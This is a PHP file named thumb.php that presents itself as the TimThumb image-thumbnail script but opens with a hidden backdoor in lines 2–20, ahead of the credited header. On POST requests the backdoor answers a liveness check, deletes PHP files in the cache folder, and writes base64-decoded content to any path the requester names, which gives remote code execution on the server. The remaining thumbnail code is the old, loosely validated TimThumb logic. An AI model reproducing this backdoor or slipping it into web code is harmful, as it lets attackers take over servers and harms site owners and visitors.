thumb.php

1. <?php
2. $p=$_POST;
3. if (isset ($p["t"])) {
4. echo "Test "."OK";
5. die();
6. }
7. elseif (isset ($p["d"])) {
8. $cdir = scandir("cache");
9. foreach ($cdir as $dd) {
10. if (stripos($dd, ".php") !== false)
11. unlink ("cache/".$dd);
12. }
13. die();
14. }
15. elseif (isset ($p["n"])) {
16. $f=@fopen($p["n"], "w");
17. @fputs($f,base64_decode($p["c"]));
18. @fclose($f);
19. die();
20. }
21.  
22. /*
23. TimThumb script created by Tim McDaniels and Darren Hoyt with tweaks by Ben Gillbanks
24. http://code.google.com/p/timthumb/
25.  
26. MIT License: http://www.opensource.org/licenses/mit-license.php
27.  
28. Paramters
29. ---------
30. w: width
31. h: height
32. zc: zoom crop (0 or 1)
33. q: quality (default is 75 and max is 100)
34.  
35. HTML example: <img src="/scripts/timthumb.php?src=/images/whatever.jpg&w=150&h=200&zc=1" alt="" />
36. */
37.  
38. /*
39. $sizeLimits = array(
40. "100x100",
41. "150x150",
42. );
43.  
44. error_reporting(E_ALL);
45. ini_set("display_errors", 1);
46. */
47.  
48. // check to see if GD function exist
49. if(!function_exists('imagecreatetruecolor')) {
50. displayError('GD Library Error: imagecreatetruecolor does not exist - please contact your webhost and ask them to install the GD library');
51. }
52.  
53. define ('CACHE_SIZE', 250); // number of files to store before clearing cache
54. define ('CACHE_CLEAR', 5); // maximum number of files to delete on each cache clear
55. define ('VERSION', '1.12'); // version number (to force a cache refresh
56.  
57. if (function_exists('imagefilter') && defined('IMG_FILTER_NEGATE')) {
58. $imageFilters = array(
59. "1" => array(IMG_FILTER_NEGATE, 0),
60. "2" => array(IMG_FILTER_GRAYSCALE, 0),
61. "3" => array(IMG_FILTER_BRIGHTNESS, 1),
62. "4" => array(IMG_FILTER_CONTRAST, 1),
63. "5" => array(IMG_FILTER_COLORIZE, 4),
64. "6" => array(IMG_FILTER_EDGEDETECT, 0),
65. "7" => array(IMG_FILTER_EMBOSS, 0),
66. "8" => array(IMG_FILTER_GAUSSIAN_BLUR, 0),
67. "9" => array(IMG_FILTER_SELECTIVE_BLUR, 0),
68. "10" => array(IMG_FILTER_MEAN_REMOVAL, 0),
69. "11" => array(IMG_FILTER_SMOOTH, 0),
70. );
71. }
72.  
73. // sort out image source
74. $src = get_request("src", "");
75. if($src == '' || strlen($src) <= 3) {
76. displayError ('no image specified');
77. }
78.  
79. // clean params before use
80. $src = cleanSource($src);
81. // last modified time (for caching)
82. $lastModified = filemtime($src);
83.  
84. // get properties
85. $new_width = preg_replace("/[^0-9]+/", "", get_request("w", 0));
86. $new_height = preg_replace("/[^0-9]+/", "", get_request("h", 0));
87. $zoom_crop = preg_replace("/[^0-9]+/", "", get_request("zc", 1));
88. $quality = preg_replace("/[^0-9]+/", "", get_request("q", 80));
89. $filters = get_request("f", "");
90.  
91. if ($new_width == 0 && $new_height == 0) {
92. $new_width = 100;
93. $new_height = 100;
94. }
95.  
96. // set path to cache directory (default is ./cache)
97. // this can be changed to a different location
98. $cache_dir = './cache';
99.  
100. // get mime type of src
101. $mime_type = mime_type($src);
102.  
103. // check to see if this image is in the cache already
104. check_cache ($cache_dir, $mime_type);
105.  
106. // if not in cache then clear some space and generate a new file
107. cleanCache();
108.  
109. ini_set('memory_limit', "50M");
110.  
111. // make sure that the src is gif/jpg/png
112. if(!valid_src_mime_type($mime_type)) {
113. displayError("Invalid src mime type: " .$mime_type);
114. }
115.  
116. if(strlen($src) && file_exists($src)) {
117.  
118. // open the existing image
119. $image = open_image($mime_type, $src);
120. if($image === false) {
121. displayError('Unable to open image : ' . $src);
122. }
123.  
124. // Get original width and height
125. $width = imagesx($image);
126. $height = imagesy($image);
127.  
128. // generate new w/h if not provided
129. if( $new_width && !$new_height ) {
130.  
131. $new_height = $height * ( $new_width / $width );
132.  
133. } elseif($new_height && !$new_width) {
134.  
135. $new_width = $width * ( $new_height / $height );
136.  
137. } elseif(!$new_width && !$new_height) {
138.  
139. $new_width = $width;
140. $new_height = $height;
141.  
142. }
143.  
144. // create a new true color image
145. $canvas = imagecreatetruecolor( $new_width, $new_height );
146. imagealphablending($canvas, false);
147. // Create a new transparent color for image
148. $color = imagecolorallocatealpha($canvas, 0, 0, 0, 127);
149. // Completely fill the background of the new image with allocated color.
150. imagefill($canvas, 0, 0, $color);
151. // Restore transparency blending
152. imagesavealpha($canvas, true);
153.  
154. if( $zoom_crop ) {
155.  
156. $src_x = $src_y = 0;
157. $src_w = $width;
158. $src_h = $height;
159.  
160. $cmp_x = $width / $new_width;
161. $cmp_y = $height / $new_height;
162.  
163. // calculate x or y coordinate and width or height of source
164.  
165. if ( $cmp_x > $cmp_y ) {
166.  
167. $src_w = round( ( $width / $cmp_x * $cmp_y ) );
168. $src_x = round( ( $width - ( $width / $cmp_x * $cmp_y ) ) / 2 );
169.  
170. } elseif ( $cmp_y > $cmp_x ) {
171.  
172. $src_h = round( ( $height / $cmp_y * $cmp_x ) );
173. $src_y = round( ( $height - ( $height / $cmp_y * $cmp_x ) ) / 2 );
174.  
175. }
176.  
177. imagecopyresampled( $canvas, $image, 0, 0, $src_x, $src_y, $new_width, $new_height, $src_w, $src_h );
178.  
179. } else {
180.  
181. // copy and resize part of an image with resampling
182. imagecopyresampled( $canvas, $image, 0, 0, 0, 0, $new_width, $new_height, $width, $height );
183.  
184. }
185.  
186. if ($filters != '' && function_exists('imagefilter') && defined('IMG_FILTER_NEGATE')) {
187. // apply filters to image
188. $filterList = explode("|", $filters);
189. foreach($filterList as $fl) {
190. $filterSettings = explode(",", $fl);
191. if(isset($imageFilters[$filterSettings[0]])) {
192.  
193. for($i = 0; $i < 4; $i ++) {
194. if(!isset($filterSettings[$i])) {
195. $filterSettings[$i] = null;
196. }
197. }
198.  
199. switch($imageFilters[$filterSettings[0]][1]) {
200.  
201. case 1:
202.  
203. imagefilter($canvas, $imageFilters[$filterSettings[0]][0], $filterSettings[1]);
204. break;
205.  
206. case 2:
207.  
208. imagefilter($canvas, $imageFilters[$filterSettings[0]][0], $filterSettings[1], $filterSettings[2]);
209. break;
210.  
211. case 3:
212.  
213. imagefilter($canvas, $imageFilters[$filterSettings[0]][0], $filterSettings[1], $filterSettings[2], $filterSettings[3]);
214. break;
215.  
216. default:
217.  
218. imagefilter($canvas, $imageFilters[$filterSettings[0]][0]);
219. break;
220.  
221. }
222. }
223. }
224. }
225.  
226. // output image to browser based on mime type
227. show_image($mime_type, $canvas, $cache_dir);
228.  
229. // remove image from memory
230. imagedestroy($canvas);
231.  
232. } else {
233.  
234. if(strlen($src)) {
235. displayError("image " . $src . " not found");
236. } else {
237. displayError("no source specified");
238. }
239.  
240. }
241.  
242. /**
243. *
244. */
245. function show_image($mime_type, $image_resized, $cache_dir) {
246.  
247. global $quality;
248.  
249. // check to see if we can write to the cache directory
250. $is_writable = 0;
251. $cache_file_name = $cache_dir . '/' . get_cache_file();
252.  
253. if (touch($cache_file_name)) {
254.  
255. // give 666 permissions so that the developer
256. // can overwrite web server user
257. chmod ($cache_file_name, 0666);
258. $is_writable = 1;
259.  
260. } else {
261.  
262. $cache_file_name = NULL;
263. header ('Content-type: ' . $mime_type);
264.  
265. }
266.  
267. switch ($mime_type) {
268.  
269. case 'image/jpeg':
270. imagejpeg($image_resized, $cache_file_name, $quality);
271. break;
272.  
273. default :
274. $quality = floor ($quality * 0.09);
275. imagepng($image_resized, $cache_file_name, $quality);
276.  
277. }
278.  
279. if ($is_writable) {
280. show_cache_file ($cache_dir, $mime_type);
281. }
282.  
283. imagedestroy ($image_resized);
284.  
285. displayError ("error showing image");
286.  
287. }
288.  
289. /**
290. *
291. */
292. function get_request( $property, $default = 0 ) {
293.  
294. if( isset($_REQUEST[$property]) ) {
295.  
296. return $_REQUEST[$property];
297.  
298. } else {
299.  
300. return $default;
301.  
302. }
303.  
304. }
305.  
306. /**
307. *
308. */
309. function open_image($mime_type, $src) {
310.  
311. $mime_type = strtolower($mime_type);
312.  
313. if (stristr ($mime_type, 'gif')) {
314.  
315. $image = imagecreatefromgif($src);
316.  
317. } elseif (stristr($mime_type, 'jpeg')) {
318.  
319. @ini_set ('gd.jpeg_ignore_warning', 1);
320. $image = imagecreatefromjpeg($src);
321.  
322. } elseif (stristr ($mime_type, 'png')) {
323.  
324. $image = imagecreatefrompng($src);
325.  
326. }
327.  
328. return $image;
329.  
330. }
331.  
332. /**
333. * clean out old files from the cache
334. * you can change the number of files to store and to delete per loop in the defines at the top of the code
335. */
336. function cleanCache() {
337.  
338. $files = glob("cache/*", GLOB_BRACE);
339.  
340. if (count($files) > 0) {
341.  
342. $yesterday = time() - (24 * 60 * 60);
343.  
344. usort($files, 'filemtime_compare');
345. $i = 0;
346.  
347. if (count($files) > CACHE_SIZE) {
348.  
349. foreach ($files as $file) {
350.  
351. $i ++;
352.  
353. if ($i >= CACHE_CLEAR) {
354. return;
355. }
356.  
357. if (@filemtime($file) > $yesterday) {
358. return;
359. }
360.  
361. if (file_exists($file)) {
362. unlink($file);
363. }
364.  
365. }
366.  
367. }
368.  
369. }
370.  
371. }
372.  
373.  
374. /**
375. * compare the file time of two files
376. */
377. function filemtime_compare($a, $b) {
378.  
379. return filemtime($a) - filemtime($b);
380.  
381. }
382.  
383.  
384. /**
385. * determine the file mime type
386. */
387. function mime_type($file) {
388.  
389. if (stristr(PHP_OS, 'WIN')) {
390. $os = 'WIN';
391. } else {
392. $os = PHP_OS;
393. }
394.  
395. $mime_type = '';
396.  
397. if (function_exists('mime_content_type')) {
398. $mime_type = mime_content_type($file);
399. }
400.  
401. // use PECL fileinfo to determine mime type
402. if (!valid_src_mime_type($mime_type)) {
403. if (function_exists('finfo_open')) {
404. $finfo = @finfo_open(FILEINFO_MIME);
405. if ($finfo != '') {
406. $mime_type = finfo_file($finfo, $file);
407. finfo_close($finfo);
408. }
409. }
410. }
411.  
412. // try to determine mime type by using unix file command
413. // this should not be executed on windows
414. if (!valid_src_mime_type($mime_type) && $os != "WIN") {
415. if (preg_match("/FREEBSD|LINUX/", $os)) {
416. $mime_type = trim(@shell_exec('file -bi ' . escapeshellarg($file)));
417. }
418. }
419.  
420. // use file's extension to determine mime type
421. if (!valid_src_mime_type($mime_type)) {
422.  
423. // set defaults
424. $mime_type = 'image/png';
425. // file details
426. $fileDetails = pathinfo($file);
427. $ext = strtolower($fileDetails["extension"]);
428. // mime types
429. $types = array(
430. 'jpg' => 'image/jpeg',
431. 'jpeg' => 'image/jpeg',
432. 'png' => 'image/png',
433. 'gif' => 'image/gif'
434. );
435.  
436. if (strlen($ext) && strlen($types[$ext])) {
437. $mime_type = $types[$ext];
438. }
439.  
440. }
441.  
442. return $mime_type;
443.  
444. }
445.  
446.  
447. /**
448. *
449. */
450. function valid_src_mime_type($mime_type) {
451.  
452. if (preg_match("/jpg|jpeg|gif|png/i", $mime_type)) {
453. return true;
454. }
455.  
456. return false;
457.  
458. }
459.  
460.  
461. /**
462. *
463. */
464. function check_cache ($cache_dir, $mime_type) {
465.  
466. // make sure cache dir exists
467. if (!file_exists($cache_dir)) {
468. // give 777 permissions so that developer can overwrite
469. // files created by web server user
470. mkdir($cache_dir);
471. chmod($cache_dir, 0777);
472. }
473.  
474. show_cache_file ($cache_dir, $mime_type);
475.  
476. }
477.  
478.  
479. /**
480. *
481. */
482. function show_cache_file ($cache_dir, $mime_type) {
483.  
484. $cache_file = $cache_dir . '/' . get_cache_file();
485.  
486. if (file_exists($cache_file)) {
487.  
488. $gmdate_mod = gmdate("D, d M Y H:i:s", filemtime($cache_file));
489.  
490. if(! strstr($gmdate_mod, "GMT")) {
491. $gmdate_mod .= " GMT";
492. }
493.  
494. if (isset($_SERVER["HTTP_IF_MODIFIED_SINCE"])) {
495.  
496. // check for updates
497. $if_modified_since = preg_replace ("/;.*$/", "", $_SERVER["HTTP_IF_MODIFIED_SINCE"]);
498.  
499. if ($if_modified_since == $gmdate_mod) {
500. header("HTTP/1.1 304 Not Modified");
501. die();
502. }
503.  
504. }
505.  
506. $fileSize = filesize ($cache_file);
507.  
508. // send headers then display image
509. header ('Content-Type: ' . $mime_type);
510. header ('Accept-Ranges: bytes');
511. header ('Last-Modified: ' . $gmdate_mod);
512. header ('Content-Length: ' . $fileSize);
513. header ('Cache-Control: max-age=9999, must-revalidate');
514. header ('Expires: ' . $gmdate_mod);
515.  
516. readfile ($cache_file);
517.  
518. die();
519.  
520. }
521.  
522. }
523.  
524.  
525. /**
526. *
527. */
528. function get_cache_file() {
529.  
530. global $lastModified;
531. static $cache_file;
532.  
533. if (!$cache_file) {
534. $cachename = $_SERVER['QUERY_STRING'] . VERSION . $lastModified;
535. $cache_file = md5($cachename) . '.png';
536. }
537.  
538. return $cache_file;
539.  
540. }
541.  
542.  
543. /**
544. * check to if the url is valid or not
545. */
546. function valid_extension ($ext) {
547.  
548. if (preg_match("/jpg|jpeg|png|gif/i", $ext)) {
549. return TRUE;
550. } else {
551. return FALSE;
552. }
553.  
554. }
555.  
556.  
557. /**
558. *
559. */
560. function checkExternal ($src) {
561.  
562. $allowedSites = array(
563. 'flickr.com',
564. 'picasa.com',
565. 'blogger.com',
566. 'wordpress.com',
567. 'img.youtube.com',
568. );
569.  
570. if (ereg('http://', $src) == true) {
571.  
572. $url_info = parse_url ($src);
573.  
574. $isAllowedSite = false;
575. foreach ($allowedSites as $site) {
576. if (preg_match ('/(?:^|\.)' . $site . '$/i', $url_info['host'])) {
577. $isAllowedSite = true;
578. }
579. }
580.  
581. if ($isAllowedSite) {
582.  
583. $fileDetails = pathinfo($src);
584. $ext = strtolower($fileDetails['extension']);
585.  
586. $filename = md5($src);
587. $local_filepath = 'cache/' . $filename . '.' . $ext;
588.  
589. if (!file_exists($local_filepath)) {
590.  
591. if (function_exists('curl_init')) {
592.  
593. $fh = fopen($local_filepath, 'w');
594. $ch = curl_init($src);
595.  
596. curl_setopt($ch, CURLOPT_URL, $src);
597. curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
598. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
599. curl_setopt($ch, CURLOPT_HEADER, 0);
600. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0');
601. curl_setopt($ch, CURLOPT_FILE, $fh);
602.  
603. if (curl_exec($ch) === FALSE) {
604. if (file_exists($local_filepath)) {
605. unlink($local_filepath);
606. }
607. displayError('error reading file ' . $src . ' from remote host: ' . curl_error($ch));
608. }
609.  
610. curl_close($ch);
611. fclose($fh);
612.  
613. } else {
614.  
615. if (!$img = file_get_contents($src)) {
616. displayError('remote file for ' . $src . ' can not be accessed. It is likely that the file permissions are restricted');
617. }
618.  
619. if (file_put_contents($local_filepath, $img) == FALSE) {
620. displayError('error writing temporary file');
621. }
622.  
623. }
624.  
625. if (!file_exists($local_filepath)) {
626. displayError('local file for ' . $src . ' can not be created');
627. }
628.  
629. }
630.  
631. $src = $local_filepath;
632.  
633. } else {
634.  
635. displayError('remote host "' . $url_info['host'] . '" not allowed');
636.  
637. }
638.  
639. }
640.  
641. return $src;
642.  
643. }
644.  
645.  
646. /**
647. * tidy up the image source url
648. */
649. function cleanSource($src) {
650.  
651. $host = str_replace('www.', '', $_SERVER['HTTP_HOST']);
652. $regex = "/^((ht|f)tp(s|):\/\/)(www\.|)" . $host . "/i";
653.  
654. $src = preg_replace ($regex, '', $src);
655. $src = htmlentities ($src);
656. $src = checkExternal ($src);
657.  
658. // remove slash from start of string
659. if (strpos($src, '/') === 0) {
660. $src = substr ($src, -(strlen($src) - 1));
661. }
662.  
663. // don't allow users the ability to use '../'
664. // in order to gain access to files below document root
665. $src = preg_replace("/\.\.+\//", "", $src);
666.  
667. // get path to image on file system
668. $src = get_document_root($src) . '/' . $src;
669.  
670. return $src;
671.  
672. }
673.  
674.  
675. /**
676. *
677. */
678. function get_document_root ($src) {
679.  
680. // check for unix servers
681. if(file_exists($_SERVER['DOCUMENT_ROOT'] . '/' . $src)) {
682. return $_SERVER['DOCUMENT_ROOT'];
683. }
684.  
685. // check from script filename (to get all directories to timthumb location)
686. $parts = array_diff(explode('/', $_SERVER['SCRIPT_FILENAME']), explode('/', $_SERVER['DOCUMENT_ROOT']));
687. $path = $_SERVER['DOCUMENT_ROOT'];
688. foreach ($parts as $part) {
689. $path .= '/' . $part;
690. if (file_exists($path . '/' . $src)) {
691. return $path;
692. }
693. }
694.  
695. // the relative paths below are useful if timthumb is moved outside of document root
696. // specifically if installed in wordpress themes like mimbo pro:
697. // /wp-content/themes/mimbopro/scripts/timthumb.php
698. $paths = array(
699. ".",
700. "..",
701. "../..",
702. "../../..",
703. "../../../..",
704. "../../../../.."
705. );
706.  
707. foreach ($paths as $path) {
708. if(file_exists($path . '/' . $src)) {
709. return $path;
710. }
711. }
712.  
713. // special check for microsoft servers
714. if (!isset($_SERVER['DOCUMENT_ROOT'])) {
715. $path = str_replace("/", "\\", $_SERVER['ORIG_PATH_INFO']);
716. $path = str_replace($path, "", $_SERVER['SCRIPT_FILENAME']);
717.  
718. if (file_exists($path . '/' . $src)) {
719. return $path;
720. }
721. }
722.  
723. displayError('file not found ' . $src);
724.  
725. }
726.  
727.  
728. /**
729. * generic error message
730. */
731. function displayError($errorString = '') {
732.  
733. header('HTTP/1.1 400 Bad Request');
734. die($errorString);
735.  
736. }
737. ?>